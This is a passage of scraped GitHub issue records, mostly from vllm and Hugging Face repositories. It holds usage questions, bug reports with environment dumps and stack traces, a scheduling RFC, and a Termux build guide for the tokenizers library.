sanitization\nVulnerability Spectre v2: Mitigation; Enhanced / Automatic IBRS; IBPB conditional; STIBP disabled; RSB filling; PBRSB-eIB", "url": "https://github.com/vllm-project/vllm/issues/29871", "state": "open", "labels": [ "usage" ], "created_at": "2025-12-02T11:25:25Z", "updated_at": "2025-12-02T15:30:53Z", "comments": 2, "user": "muelphil" }, { "repo": "vllm-project/vllm", "number": 29866, "title": "[Doc]:", "body": "### \ud83d\udcda The doc issue\n\n# Installation des biblioth\u00e8ques XAI\n!pip install shap\n!pip install lime\n!pip install alibi\n!pip install interpret\n!pip install dalex\n!pip install eli5\n\n\n### Suggest a potential alternative/fix\n\n# Installation des biblioth\u00e8ques XAI\n!pip install shap\n!pip install lime\n!pip install alibi\n!pip install interpret\n!pip install dalex\n!pip install eli5\n\n### Before submitting a new issue...\n\n- [x] Make sure you already searched for relevant issues, and asked the chatbot living at the bottom right corner of the [documentation page](https://docs.vllm.ai/en/latest/), which can answer lots of frequently asked questions.", "url": "https://github.com/vllm-project/vllm/issues/29866", "state": "closed", "labels": [ "documentation" ], "created_at": "2025-12-02T10:43:04Z", "updated_at": "2025-12-02T10:50:10Z", "comments": 0, "user": "hassaballahmahamatahmat5-cpu" }, { "repo": "vllm-project/vllm", "number": 29865, "title": "[Doc]:", "body": "### \ud83d\udcda The doc issue\n\n# Installation des biblioth\u00e8ques XAI\n!pip install shap\n!pip install lime\n!pip install alibi\n!pip install interpret\n!pip install dalex\n!pip install eli5\n\n\n### Suggest a potential alternative/fix\n\n# Installation des biblioth\u00e8ques XAI\n!pip install shap\n!pip install lime\n!pip install alibi\n!pip install interpret\n!pip install dalex\n!pip install eli5\n\n### Before submitting a new issue...\n\n- [x] Make sure you already searched for relevant issues, and asked the chatbot living at the bottom right corner of the [documentation page](https://docs.vllm.ai/en/latest/), which can answer lots of frequently asked questions.", "url": "https://github.com/vllm-project/vllm/issues/29865", "state": "closed", "labels": [ "documentation" ], "created_at": "2025-12-02T10:43:01Z", "updated_at": "2025-12-02T10:50:00Z", "comments": 0, "user": "hassaballahmahamatahmat5-cpu" }, { "repo": "vllm-project/vllm", "number": 29864, "title": "[Usage]: I am unable to run the GLM-4.5-Air-REAP-82B-A12B-nvfp4 model on an RTX 5090.", "body": "### Your current environment\n\n\n I am unable to run the GLM-4.5-Air-REAP-82B-A12B-nvfp4 model on an RTX 5090.\n\n```text\nCollecting environment information...\n==============================\n System Info\n==============================\nOS : Ubuntu 22.04.5 LTS (x86_64)\nGCC version : (Ubuntu 12.3.0-1ubuntu1~22.04.2) 12.3.0\nClang version : Could not collect\nCMake version : version 4.2.0\nLibc version : glibc-2.35\n\n==============================\n PyTorch Info\n==============================\nPyTorch version : 2.10.0.dev20251124+cu128\nIs debug build : False\nCUDA used to build PyTorch : 12.8\nROCM used to build PyTorch : N/A\n\n==============================\n Python Environment\n==============================\nPython version : 3.10.12 (main, Nov 4 2025, 08:48:33) [GCC 11.4.0] (64-bit runtime)\nPython platform : Linux-6.8.0-87-generic-x86_64-with-glibc2.35\n\n==============================\n CUDA / GPU Info\n==============================\nIs CUDA available : True\nCUDA runtime version : 12.8.93\nCUDA_MODULE_LOADING set to : \nGPU models and configuration : \nGPU 0: NVIDIA GeForce RTX 5090\nGPU 1: NVIDIA GeForce RTX 5090\nGPU 2: NVIDIA GeForce RTX 5090\nGPU 3: NVIDIA GeForce RTX 5090\n\nNvidia driver version : 570.172.08\ncuDNN version : Could not collect\nHIP runtime version : N/A\nMIOpen runtime version : N/A\nIs XNNPACK available : True\n\n==============================\n CPU Info\n==============================\nArchitecture: x86_64\nCPU op-mode(s): 32-bit, 64-bit\nAddress sizes: 46 bits physical, 57 bits virtual\nByte Order: Little Endian\nCPU(s): 112\nOn-line CPU(s) list: 0-111\nVendor ID: GenuineIntel\nModel name: Intel(R) Xeon(R) Gold 6330 CPU @ 2.00GHz\nCPU family: 6\nModel: 106\nThread(s) per core: 2\nCore(s) per socket: 28\nSocket(s): 2\nStepping: 6\nCPU max MHz: 3100.0000\nCPU min MHz: 800.0000\nBogoMIPS: 4000.00\nFlags: fpu vme de pse tsc msr pae mce cx8 apic sep mtrr pge mca cmov pat pse36 clflush dts acpi mmx fxsr sse sse2 ss ht tm pbe syscall nx pdpe1gb rdtscp lm constant_tsc art arch_perfmon pebs bts rep_good nopl xtopology nonstop_tsc cpuid aperfmperf pni pclmulqdq dtes64 monitor ds_cpl vmx smx est tm2 ssse3 sdbg fma cx16 xtpr pdcm pcid dca sse4_1 sse4_2 x2apic movbe popcnt tsc_deadline_timer aes xsave avx f16c rdrand lahf_lm abm 3dnowprefetch cpuid_fault epb cat_l3 intel_ppin ssbd mba ibrs ibpb stibp ibrs_enhanced tpr_shadow flexpriority ept vpid ept_ad fsgsbase tsc_adjust bmi1 avx2 smep bmi2 erms invpcid cqm rdt_a avx512f avx512dq rdseed adx smap avx512ifma clflushopt clwb intel_pt avx512cd sha_ni avx512bw avx512vl xsaveopt xsavec xgetbv1 xsaves cqm_llc cqm_occup_llc cqm_mbm_total cqm_mbm_local split_lock_detect wbnoinvd dtherm ida arat pln pts hwp hwp_act_window hwp_epp hwp_pkg_req vnmi avx512vbmi umip pku ospke avx512_vbmi2 gfni vaes vpclmulqdq avx512_vnni avx512_bitalg tme avx512_vpopcntdq la57 rdpid fsrm md_clear pconfig flush_l1d arch_capabilities\nVirtualization: VT-x\nL1d cache: 2.6 MiB (56 instances)\nL1i cache: 1.8 MiB (56 instances)\nL2 cache: 70 MiB (56 instances)\nL3 cache: 84 MiB (2 instances)\nNUMA node(s): 2\nNUMA node0 CPU(s): 0-27,56-83\nNUMA node1 CPU(s): 28-55,84-111\nVulnerability Gather data sampling: Mitigation; Microcode\nVulnerability Itlb multihit: Not affected\nVulnerability L1tf: Not affected\nVulnerability Mds: Not affected\nVulnerability Meltdown: Not affected\nVulnerability Mmio stale data: Mitigation; Clear CPU buffers; SMT vulnerable\nVulnerability Reg file data sampling: Not affected\nVulnerability Retbleed: Not affected\nVulnerability Spec rstack overflow: Not affected\nVulnerability Spec store bypass: Mitigation; Speculative Store Bypass disabled via prctl\nVulnerability Spectre v1: Mitigation; usercopy/swapgs barriers and __user pointer sanitization\nVulnerability Spectre v2: Mitigation; Enhanced / Automatic IBRS; IBPB conditional; RSB filling; PBRSB-eIBRS SW sequence; BHI SW loop, KVM SW loop\nVulnerability Srbds: Not affected\nVulnerability Tsx async abort: Not affected\nVulnerability Vmscape: Not affected\n", "url": "https://github.com/vllm-project/vllm/issues/29864", "state": "open", "labels": [ "usage" ], "created_at": "2025-12-02T10:13:31Z", "updated_at": "2025-12-05T17:06:30Z", "comments": 2, "user": "east612-ai" }, { "repo": "huggingface/diffusers", "number": 12772, "title": "How to convert diffusers model to wan2.2 format", "body": "I see convert_wan_to_diffusers.py in diffusers repo, but no convert_diffusers_to_wan.py. Do you have plan to upload a convert scripts?\n", "url": "https://github.com/huggingface/diffusers/issues/12772", "state": "open", "labels": [], "created_at": "2025-12-02T09:19:29Z", "updated_at": "2025-12-02T09:19:29Z", "user": "wikiwen" }, { "repo": "huggingface/diffusers", "number": 12764, "title": "When will the img2img pipeline of FLUX.2-dev be released?", "body": "I see that the current version(0.36.0-dev) only updated the text-to-image pipeline for Flux2. We are looking forward to the update of the image-to-image pipeline!\n", "url": "https://github.com/huggingface/diffusers/issues/12764", "state": "open", "labels": [], "created_at": "2025-12-01T11:25:35Z", "updated_at": "2025-12-01T11:41:56Z", "comments": 1, "user": "guanxyu" }, { "repo": "huggingface/smolagents", "number": 1890, "title": "Question: how to use sever-side tools provided by Google Gemini or OpenAI GPT?", "body": "Gemini has some server-side tools like google_search (https://ai.google.dev/gemini-api/docs/google-search) or google_map. OpenAI also has server-side tools like web_search. Does Smolagents support using such server-side tools from agents? If so, how?", "url": "https://github.com/huggingface/smolagents/issues/1890", "state": "open", "labels": [], "created_at": "2025-12-01T05:16:01Z", "updated_at": "2025-12-23T10:49:45Z", "user": "victorx-deckard" }, { "repo": "huggingface/agents-course", "number": 623, "title": "Message: Submission received, but no valid/matching task IDs were found in the 1 answers provided. Score did not improve previous record, leaderboard not updated.", "body": "I am correctly downloading the GAIA 2023 Level 1 validation dataset using snapshot_download and load_dataset. This submission is for Unit 4 Agent Course. \n\n data_dir = snapshot_download(\n repo_id=\"gaia-benchmark/GAIA\",\n repo_type=\"dataset\"\n )\n \n dataset = load_dataset(data_dir, \"2023_level1\", split=\"validation\")\n subset = dataset.select(range(20))\n for item in subset:\n task_id = item.get(\"task_id\")\n question_text = item.get(\"Question\")\n file_name = item.get(\"file_name\")\n\nI experience failures when trying to run the first 20 questions i received only 5 task ids are valid.. When I specifically tried to isolate and run the task ID '935e2cff-ae78-4218-b3f5-115589b19dae' using the filtering method, the evaluation system reported. \n\n\"Image\"\n\n 'Submission received, but no valid/matching task IDs were found in the 1 answers provided.' This occurred even though I was confident the answer was correct", "url": "https://github.com/huggingface/agents-course/issues/623", "state": "open", "labels": [ "question" ], "created_at": "2025-12-01T02:09:21Z", "updated_at": "2025-12-01T02:09:21Z", "user": "ShwetaBorole" }, { "repo": "huggingface/tokenizers", "number": 1902, "title": "Guide: Compiling `tokenizers` on Android/Termux", "body": "Hello Hugging Face team and fellow developers,\n\nThis is a guide for anyone trying to install `tokenizers` (or packages that depend on it, like `transformers` or `docling`) on an Android device using [Termux](https://termux.dev/). Currently, there are no other issues mentioning Termux, so hopefully, this guide can help others.\n\n### The Problem\n\nWhen running `pip install tokenizers` in a standard Termux environment, the installation fails during the compilation of a C++ dependency with an error similar to this:\n```\nerror: use of undeclared identifier 'pthread_cond_clockwait'\n```\nThis happens because the build system is targeting an Android API level where this function is not available in the C library headers.\n\n### The Solution\n\nThe solution is to force the compilation from source and pass specific flags to the C++ compiler to set the correct Android API level and link the required libraries.\n\nHere is a step-by-step guide:\n\n#### Step 1: Install Build Dependencies\n\nYou will need the Rust toolchain and other build essentials. You can install them in Termux using `pkg`:\n```bash\npkg update && pkg install rust clang make maturin\n```\n\n#### Step 2: Find Your Android API Level\n\nThe fix requires telling the compiler which Android API level you are using. You can get this number by running the following command in your Termux shell:\n```bash\ngetprop ro.build.version.sdk\n```\nThis will return a number, for example `29`, `30`, `33`, etc. This function (`pthread_cond_clockwait`) was introduced in API level 21, so your device's level should be higher than that.\n\n#### Step 3: Compile and Install `tokenizers`\n\nNow, you can install the package using `pip`. The command below will automatically use the API level from the previous step.\n\n```bash\n# This command automatically gets your API level and uses it to compile tokenizers\nANDROID_API_LEVEL=$(getprop ro.build.version.sdk)\nCXXFLAGS=\"-lpthread -D__ANDROID_API__=${ANDROID_API_LEVEL}\" pip install tokenizers --no-binary :all:\n```\n\nAfter this, `pip install tokenizers` (and packages that depend on it) should succeed.\n\n#### Explanation of the Flags:\n\n* `CXXFLAGS=\"...\"`: This sets environment variables to pass flags to the C++ compiler.\n* `-lpthread`: This flag explicitly tells the linker to link against the POSIX threads library.\n* `-D__ANDROID_API__=${ANDROID_API_LEVEL}`: This is the critical part. It defines a macro that tells the C++ headers to expose functions available for your specific Android version, making `pthread_cond_clockwait` visible to the compiler.\n* `--no-binary :all:`: This forces `pip` to ignore pre-compiled wheels and build the package from the source code, which is necessary for the flags to be applied.\n\nHope this helps other developers working in the Termux environment!", "url": "https://github.com/huggingface/tokenizers/issues/1902", "state": "open", "labels": [], "created_at": "2025-12-01T00:46:42Z", "updated_at": "2025-12-01T00:46:42Z", "comments": 0, "user": "Manamama-Gemini-Cloud-AI-01" }, { "repo": "vllm-project/vllm", "number": 29747, "title": "[Bug]: --scheduling-policy=priority & n>1 crashes engine", "body": "### Your current environment\n\n
\nThe output of python collect_env.py\n\n```text\nYour output of `python collect_env.py` here\n```\n\n
\n\n\n### \ud83d\udc1b Describe the bug\n\nWhen running with priority scheduling, e.g.:\n```bash\nvllm serve Qwen/Qwen3-0.6B --scheduling-policy=priority\n```\n\nand using `n` > 1 in the request, like:\n```python\nfrom openai import OpenAI\n\nclient = OpenAI(base_url=\"http://localhost:8000/v1\", api_key=\"dummy\")\n\nres = client.chat.completions.create(\n model=client.models.list().data[0].id,\n messages=[{\"role\": \"user\", \"content\": \"What is the meaning of life?\"}],\n n=2\n)\n\nprint(res)\n```\n\nvllm crashes with:\n```python\n(EngineCore_DP0 pid=207394) ERROR 11-30 15:14:29 [core.py:844] EngineCore encountered a fatal error.\n(EngineCore_DP0 pid=207394) ERROR 11-30 15:14:29 [core.py:844] Traceback (most recent call last):\n(EngineCore_DP0 pid=207394) ERROR 11-30 15:14:29 [core.py:844] File \"/home/user/code/debug/.venv/lib/python3.10/site-packages/vllm/v1/engine/core.py\", line 835, in run_engine_core\n(EngineCore_DP0 pid=207394) ERROR 11-30 15:14:29 [core.py:844] engine_core.run_busy_loop()\n(EngineCore_DP0 pid=207394) ERROR 11-30 15:14:29 [core.py:844] File \"/home/user/code/debug/.venv/lib/python3.10/site-packages/vllm/v1/engine/core.py\", line 860, in run_busy_loop\n(EngineCore_DP0 pid=207394) ERROR 11-30 15:14:29 [core.py:844] self._process_input_queue()\n(EngineCore_DP0 pid=207394) ERROR 11-30 15:14:29 [core.py:844] File \"/home/user/code/debug/.venv/lib/python3.10/site-packages/vllm/v1/engine/core.py\", line 885, in _process_input_queue\n(EngineCore_DP0 pid=207394) ERROR 11-30 15:14:29 [core.py:844] self._handle_client_request(*req)\n(EngineCore_DP0 pid=207394) ERROR 11-30 15:14:29 [core.py:844] File \"/home/user/code/debug/.venv/lib/python3.10/site-packages/vllm/v1/engine/core.py\", line 907, in _handle_client_request\n(EngineCore_DP0 pid=207394) ERROR 11-30 15:14:29 [core.py:844] self.add_request(req, request_wave)\n(EngineCore_DP0 pid=207394) ERROR 11-30 15:14:29 [core.py:844] File \"/home/user/code/debug/.venv/lib/python3.10/site-packages/vllm/v1/engine/core.py\", line 291, in add_request\n(EngineCore_DP0 pid=207394) ERROR 11-30 15:14:29 [core.py:844] self.scheduler.add_request(request)\n(EngineCore_DP0 pid=207394) ERROR 11-30 15:14:29 [core.py:844] File \"/home/user/code/debug/.venv/lib/python3.10/site-packages/vllm/v1/core/sched/scheduler.py\", line 1242, in add_request\n(EngineCore_DP0 pid=207394) ERROR 11-30 15:14:29 [core.py:844] self.waiting.add_request(request)\n(EngineCore_DP0 pid=207394) ERROR 11-30 15:14:29 [core.py:844] File \"/home/user/code/debug/.venv/lib/python3.10/site-packages/vllm/v1/core/sched/request_queue.py\", line 150, in add_request\n(EngineCore_DP0 pid=207394) ERROR 11-30 15:14:29 [core.py:844] heapq.heappush(self._heap, (request.priority, request.arrival_time, request))\n(EngineCore_DP0 pid=207394) ERROR 11-30 15:14:29 [core.py:844] TypeError: '<' not supported between instances of 'Request' and 'Request'\n(EngineCore_DP0 pid=207394) Process EngineCore_DP0:\n(APIServer pid=207278) ERROR 11-30 15:14:29 [async_llm.py:525] AsyncLLM output_handler failed.\n(APIServer pid=207278) ERROR 11-30 15:14:29 [async_llm.py:525] Traceback (most recent call last):\n(APIServer pid=207278) ERROR 11-30 15:14:29 [async_llm.py:525] File \"/home/user/code/debug/.venv/lib/python3.10/site-packages/vllm/v1/engine/async_llm.py\", line 477, in output_handler\n(APIServer pid=207278) ERROR 11-30 15:14:29 [async_llm.py:525] outputs = await engine_core.get_output_async()\n(APIServer pid=207278) ERROR 11-30 15:14:29 [async_llm.py:525] File \"/home/user/code/debug/.venv/lib/python3.10/site-packages/vllm/v1/engine/core_client.py\", line 883, in get_output_async\n(APIServer pid=207278) ERROR 11-30 15:14:29 [async_llm.py:525] raise self._format_exception(outputs) from None\n(APIServer pid=207278) ERROR 11-30 15:14:29 [async_llm.py:525] vllm.v1.engine.exceptions.EngineDeadError: EngineCore encountered an issue. See stack trace (above) for the root cause.\n(EngineCore_DP0 pid=207394) Traceback (most recent call last):\n(EngineCore_DP0 pid=207394) File \"/usr/lib/python3.10/multiprocessing/process.py\", line 314, in _bootstrap\n(EngineCore_DP0 pid=207394) self.run()\n(EngineCore_DP0 pid=207394) File \"/usr/lib/python3.10/multiprocessing/process.py\", line 108, in run\n(EngineCore_DP0 pid=207394) self._target(*self._args, **self._kwargs)\n(EngineCore_DP0 pid=207394) File \"/home/user/code/debug/.venv/lib/python3.10/site-packages/vllm/v1/engine/core.py\", line 846, in run_engine_core\n(EngineCore_DP0 pid=207394) raise e\n(EngineCore_DP0 pid=207394) File \"/home/user/code/debug/.venv/lib/python3.10/site-packages/vllm/v1/engine/core.py\", line 835, in run_engine_core\n(EngineCore_DP0 pid=207394) engine_core.run_busy_loop()\n(EngineCore_DP0 pid=207394) File \"/home/user/code/debug/.venv/lib/python3.10/site-packages/vllm/v1/engine/core.py\", line 860, in", "url": "https://github.com/vllm-project/vllm/issues/29747", "state": "closed", "labels": [ "bug" ], "created_at": "2025-11-30T13:20:23Z", "updated_at": "2025-12-02T22:42:30Z", "comments": 3, "user": "hibukipanim" }, { "repo": "vllm-project/vllm", "number": 29735, "title": "[Usage]:Accessing free_blocks count from LLMEngine or LLM ?", "body": "### Your current environment\n\n```text\nNone\n```\n\n### How would you like to use vllm\n\nI'm doing research on key-value caching optimization. I want to know how to determine the number of free blocks during runtime. I tried manually creating the engine, but I couldn't find the method after searching through the code.\nAI keeps providing methods that have already been abandoned.\nI would be very grateful for any help, as this has been puzzling me for hours.\n\n### Before submitting a new issue...\n\n- [x] Make sure you already searched for relevant issues, and asked the chatbot living at the bottom right corner of the [documentation page](https://docs.vllm.ai/en/latest/), which can answer lots of frequently asked questions.", "url": "https://github.com/vllm-project/vllm/issues/29735", "state": "closed", "labels": [ "usage" ], "created_at": "2025-11-29T19:21:50Z", "updated_at": "2025-12-05T14:01:42Z", "comments": 4, "user": "H-T-H" }, { "repo": "vllm-project/vllm", "number": 29722, "title": "[RFC]: Add Balance Scheduling", "body": "### Motivation.\n\n**Limitations of the current vLLM v1 scheduling strategy**\nvLLM v1 scheduling currently enables chunkedprefill by default, which processes prefill and decode requests simultaneously in a single scheduling session. This can impact the overall system throughput and performance in some scenarios.\n\nBalance scheduling addresses this issue by synchronizing the number of running queues across all schedulers to delay the scheduling of new requests, thereby improving the overall system's steady-state decoding time. This achieves:\n\u2705Adding `balance_gather` to the scheduler synchronizes the number of requests in the running queues between DPs.\n\u2705Balance scheduling improves the decode steady-state time, thereby increasing the overall output throughput of the inference system.\n\n\n### Proposed Change.\n\n **1.Feature Overview**\n\nIn the vLLM scheduler, running requests (i.e., requests that are already undergoing pre-filled computation) have the highest priority, followed by waiting requests (i.e., requests that have not yet been computed).\n\n\nAs shown in the diagram above, when the entire inference system exits from a steady state, the scheduler will schedule a batch of new requests for prefill operations and then synchronize them among the dynamic programming (DP) models. This can cause some DP models that are entirely decoded to synchronize with the number of prefilled tokens. Frequent prefill scheduling by certain DP models can lead to a deterioration in the overall system output throughput.\n\nBalance scheduling synchronizes the number of running queue requests across different DPs, and only schedules new requests for prefilling when at least every scheduler has fewer than max_nun_requst.\n\n **2.Implementation Design**\n\n **3.Experiment Results**\n- Fixed-length input scenario: In the performance test scenario with 3.5K fixed-length input and 1.5K fixed-length output, the throughput performance was improved by approximately **18%** after adding balance scheduling.\n\n| Method | Model | Input Len | Request Count | Output Len | BatchSize | Average TTFT | Average TPOT | e2e duration | Input Token Throughput | Output Token Throughput | Request Throughput\n| ---- | ---- | ---- | ---- | ---- | ---- | ---- | ---- | ---- | ---- | ---- | ---- |\n| Baseline | DeepSeekV3.1 | 3500 | 512 | 1500 | 128 | 6600 | 86.85 | 591.9s | 3030.5 | 1297.3 | 0.86 |\n| Balance scheduling | DeepSeekV3.1 | 3500 | 512 | 1500 | 128 | 7012 | 70.63 | 501.7s | 3575.7 | 1530.7 | 1.02 |\n\n**4.Demo PR**\n\n[#29721 ](https://github.com/vllm-project/vllm/pull/29721)\n\n\n### Feedback Period.\n\nNo response\n\n### CC List.\n\nNo response\n\n### Any Other Things.\n\nNo response\n\n### Before submitting a new issue...\n\n\n- [x] Make sure you already searched for relevant issues, and asked the chatbot living at the bottom right corner of the [documentation page](https://docs.vllm.ai/en/latest/), which can answer lots of frequently asked questions.", "url": "https://github.com/vllm-project/vllm/issues/29722", "state": "open", "labels": [ "RFC" ], "created_at": "2025-11-29T09:28:43Z", "updated_at": "2025-12-02T08:23:33Z", "comments": 0, "user": "GDzhu01" }, { "repo": "vllm-project/vllm", "number": 29707, "title": "[Usage]: Workaround to run model on GPUs with Compute Capability < 8.0?", "body": "### Your current environment\n\nProblem:\nI am unable to run the Qwen3-VL-32B-Instruct-AWQ-4bit model due to a CUDA compute capability requirement. My hardware consists of two NVIDIA QUADRO RTX 5000 cards (16GB each, 32GB total) with a compute capability of 7.5. The software framework (likely a recent version of PyTorch or a specific library) raises an error:\n\n\"GPUs with compute capability < 8.0 are not supported.\"\n\nQuestion:\nAre there any workarounds to run this model on my older QUADRO RTX 5000 GPUs? Thanks in advance.\n\n\n```\n vllm collect-env\nINFO 11-29 20:49:15 [__init__.py:216] Automatically detected platform cuda.\nCollecting environment information...\n==============================\n System Info\n==============================\nOS : Ubuntu 24.04.3 LTS (x86_64)\nGCC version : (Ubuntu 13.3.0-6ubuntu2~24.04) 13.3.0\nClang version : Could not collect\nCMake version : version 3.30.3\nLibc version : glibc-2.39\n\n==============================\n PyTorch Info\n==============================\nPyTorch version : 2.8.0+cu128\nIs debug build : False\nCUDA used to build PyTorch : 12.8\nROCM used to build PyTorch : N/A\n\n==============================\n Python Environment\n==============================\nPython version : 3.12.11 | packaged by Anaconda, Inc. | (main, Jun 5 2025, 13:09:17) [GCC 11.2.0] (64-bit runtime)\nPython platform : Linux-6.14.0-27-generic-x86_64-with-glibc2.39\n\n==============================\n CUDA / GPU Info\n==============================\nIs CUDA available : True\nCUDA runtime version : 12.0.140\nCUDA_MODULE_LOADING set to : LAZY\nGPU models and configuration :\nGPU 0: Quadro RTX 5000\nGPU 1: Quadro RTX 5000\n\nNvidia driver version : 580.65.06\ncuDNN version : Could not collect\nHIP runtime version : N/A\nMIOpen runtime version : N/A\nIs XNNPACK available : True\n\n==============================\n CPU Info\n==============================\nArchitecture: x86_64\nCPU op-mode(s): 32-bit, 64-bit\nAddress sizes: 46 bits physical, 48 bits virtual\nByte Order: Little Endian\nCPU(s): 20\nOn-line CPU(s) list: 0-19\nVendor ID: GenuineIntel\nModel name: Intel(R) Core(TM) i9-10900X CPU @ 3.70GHz\nCPU family: 6\nModel: 85\nThread(s) per core: 2\nCore(s) per socket: 10\nSocket(s): 1\nStepping: 7\nCPU(s) scaling MHz: 28%\nCPU max MHz: 4700.0000\nCPU min MHz: 1200.0000\nBogoMIPS: 7399.70\nFlags: fpu vme de pse tsc msr pae mce cx8 apic sep mtrr pge mca cmov pat pse36 clflush dts acpi mmx fxsr sse sse2 ss ht tm pbe syscall nx pdpe1gb rdtscp lm constant_tsc art arch_perfmon pebs bts rep_good nopl xtopology nonstop_tsc cpuid aperfmperf pni pclmulqdq dtes64 monitor ds_cpl est tm2 ssse3 sdbg fma cx16 xtpr pdcm pcid dca sse4_1 sse4_2 x2apic movbe popcnt tsc_deadline_timer aes xsave avx f16c rdrand lahf_lm abm 3dnowprefetch cpuid_fault epb cat_l3 cdp_l3 ssbd mba ibrs ibpb stibp ibrs_enhanced fsgsbase tsc_adjust bmi1 avx2 smep bmi2 erms invpcid cqm mpx rdt_a avx512f avx512dq rdseed adx smap clflushopt clwb intel_pt avx512cd avx512bw avx512vl xsaveopt xsavec xgetbv1 xsaves cqm_llc cqm_occup_llc cqm_mbm_total cqm_mbm_local dtherm ida arat pln pts hwp hwp_act_window hwp_epp hwp_pkg_req avx512_vnni md_clear flush_l1d arch_capabilities\nL1d cache: 320 KiB (10 instances)\nL1i cache: 320 KiB (10 instances)\nL2 cache: 10 MiB (10 instances)\nL3 cache: 19.3 MiB (1 instance)\nNUMA node(s): 1\nNUMA node0 CPU(s): 0-19\nVulnerability Gather data sampling: Vulnerable\nVulnerability Ghostwrite: Not affected\nVulnerability Itlb multihit: KVM: Mitigation: VMX unsupported\nVulnerability L1tf: Not affected\nVulnerability Mds: Not affected\nVulnerability Meltdown: Not affected\nVulnerability Mmio stale data: Mitigation; Clear CPU buffers; SMT vulnerable\nVulnerability Reg file data sampling: Not affected\nVulnerability Retbleed: Mitigation; Enhanced IBRS\nVulnerability Spec rstack overflow: Not affected\nVulnerability Spec store bypass: Mitigation; Speculative Store Bypass disabled via prctl\nVulnerability Spectre v1: Mitigation; usercopy/swapgs barriers and __user pointer sanitization\nVulnerability Spectre v2: Mitigation; Enhanced / Aut", "url": "https://github.com/vllm-project/vllm/issues/29707", "state": "closed", "labels": [ "usage" ], "created_at": "2025-11-29T00:47:39Z", "updated_at": "2025-11-30T06:04:29Z", "comments": 5, "user": "seasoncool" }, { "repo": "vllm-project/vllm", "number": 29679, "title": "[Usage]: Get request total time", "body": "### Your current environment\n\n```text\n==============================\n System Info\n==============================\nOS : Ubuntu 22.04.5 LTS (x86_64)\nGCC version : (Ubuntu 11.4.0-1ubuntu1~22.04) 11.4.0\nClang version : Could not collect\nCMake version : version 3.28.0\nLibc version : glibc-2.35\n\n==============================\n PyTorch Info\n==============================\nPyTorch version : 2.9.0+cu128\nIs debug build : False\nCUDA used to build PyTorch : 12.8\nROCM used to build PyTorch : N/A\n\n==============================\n Python Environment\n==============================\nPython version : 3.10.19 | packaged by conda-forge | (main, Oct 22 2025, 22:29:10) [GCC 14.3.0] (64-bit runtime)\nPython platform : Linux-6.8.0-1030-azure-x86_64-with-glibc2.35\n\n==============================\n CUDA / GPU Info\n==============================\nIs CUDA available : True\nCUDA runtime version : Could not collect\nCUDA_MODULE_LOADING set to : \nGPU models and configuration : GPU 0: NVIDIA H100 NVL\nNvidia driver version : 535.247.01\ncuDNN version : Probably one of the following:\n/usr/lib/x86_64-linux-gnu/libcudnn.so.9.10.2\n/usr/lib/x86_64-linux-gnu/libcudnn_adv.so.9.10.2\n/usr/lib/x86_64-linux-gnu/libcudnn_cnn.so.9.10.2\n/usr/lib/x86_64-linux-gnu/libcudnn_engines_precompiled.so.9.10.2\n/usr/lib/x86_64-linux-gnu/libcudnn_engines_runtime_compiled.so.9.10.2\n/usr/lib/x86_64-linux-gnu/libcudnn_graph.so.9.10.2\n/usr/lib/x86_64-linux-gnu/libcudnn_heuristic.so.9.10.2\n/usr/lib/x86_64-linux-gnu/libcudnn_ops.so.9.10.2\nHIP runtime version : N/A\nMIOpen runtime version : N/A\nIs XNNPACK available : True\n\n==============================\n CPU Info\n==============================\nArchitecture: x86_64\nCPU op-mode(s): 32-bit, 64-bit\nAddress sizes: 48 bits physical, 48 bits virtual\nByte Order: Little Endian\nCPU(s): 40\nOn-line CPU(s) list: 0-39\nVendor ID: AuthenticAMD\nModel name: AMD EPYC 9V84 96-Core Processor\nCPU family: 25\nModel: 17\nThread(s) per core: 1\nCore(s) per socket: 40\nSocket(s): 1\nStepping: 1\nBogoMIPS: 4800.05\nFlags: fpu vme de pse tsc msr pae mce cx8 apic sep mtrr pge mca cmov pat pse36 clflush mmx fxsr sse sse2 ht syscall nx mmxext fxsr_opt pdpe1gb rdtscp lm constant_tsc rep_good nopl tsc_reliable nonstop_tsc cpuid extd_apicid aperfmperf tsc_known_freq pni pclmulqdq ssse3 fma cx16 pcid sse4_1 sse4_2 movbe popcnt aes xsave avx f16c rdrand hypervisor lahf_lm cmp_legacy cr8_legacy abm sse4a misalignsse 3dnowprefetch osvw topoext perfctr_core vmmcall fsgsbase bmi1 avx2 smep bmi2 erms invpcid avx512f avx512dq rdseed adx smap avx512ifma clflushopt clwb avx512cd sha_ni avx512bw avx512vl xsaveopt xsavec xgetbv1 xsaves user_shstk avx512_bf16 clzero xsaveerptr rdpru arat avx512vbmi umip avx512_vbmi2 gfni vaes vpclmulqdq avx512_vnni avx512_bitalg avx512_vpopcntdq rdpid fsrm\nHypervisor vendor: Microsoft\nVirtualization type: full\nL1d cache: 1.3 MiB (40 instances)\nL1i cache: 1.3 MiB (40 instances)\nL2 cache: 40 MiB (40 instances)\nL3 cache: 160 MiB (5 instances)\nNUMA node(s): 1\nNUMA node0 CPU(s): 0-39\nVulnerability Gather data sampling: Not affected\nVulnerability Itlb multihit: Not affected\nVulnerability L1tf: Not affected\nVulnerability Mds: Not affected\nVulnerability Meltdown: Not affected\nVulnerability Mmio stale data: Not affected\nVulnerability Reg file data sampling: Not affected\nVulnerability Retbleed: Not affected\nVulnerability Spec rstack overflow: Vulnerable: Safe RET, no microcode\nVulnerability Spec store bypass: Vulnerable\nVulnerability Spectre v1: Mitigation; usercopy/swapgs barriers and __user pointer sanitization\nVulnerability Spectre v2: Mitigation; Retpolines; STIBP disabled; RSB filling; PBRSB-eIBRS Not affected; BHI Not affected\nVulnerability Srbds: Not affected\nVulnerability Tsx async abort: Not affected\n\n==============================\nVersions of relevant libraries\n==============================\n[pip3] flashinfer-python==0.5.2\n[pip3] numpy==1.26.4\n[pip3] nvidia-cublas-cu12==12.8.4.1\n[pip3] nvidia-cuda-cupti-cu12==12.8.90\n[pip3] nvidia-cuda-nvrtc-cu12==12.8.93\n[pip3] nvidia-cuda-runtime-cu12==12.8.90\n", "url": "https://github.com/vllm-project/vllm/issues/29679", "state": "closed", "labels": [ "usage" ], "created_at": "2025-11-28T14:03:16Z", "updated_at": "2025-12-01T09:34:12Z", "comments": 5, "user": "chwundermsft" }, { "repo": "huggingface/lerobot", "number": 2543, "title": "Different finetune loss given policy.type=pi0 / policy.path=lerobot/pi0_base. What is the difference?", "body": "Hi, I have two different configurations:\n1. `\t--dataset.repo_id=BBBBBBob/libero_goal_lerobot \\\n\t--dataset.root=/home/j84403411/data/libero/libero_goal_lerobot \\\n\t--policy.path=lerobot/pi0_base 